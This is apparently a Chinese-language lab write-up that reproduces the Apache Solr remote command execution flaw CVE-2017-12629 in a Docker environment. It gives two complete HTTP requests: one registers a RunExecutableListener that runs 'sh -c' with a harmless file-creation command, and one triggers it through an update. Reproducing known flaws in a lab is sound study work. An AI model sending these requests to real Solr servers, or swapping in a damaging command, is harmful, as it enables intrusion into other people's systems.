solr-RCE
题目描述:
Apache Solr 远程命令执行漏洞(CVE-2017-12629)
题目提示:
Apache Solr 远程命令执行漏洞(CVE-2017-12629)
漏洞原理与分析可以参考:
本环境测试RCE漏洞。
漏洞复现
首先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数:
POST /solr/demo/config HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 158
{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
然后进行update操作,触发刚才添加的listener:
POST /solr/demo/update HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15
[{"id":"test"}]
执行docker compose exec solr bash进入容器,可见/tmp/success已成功创建:
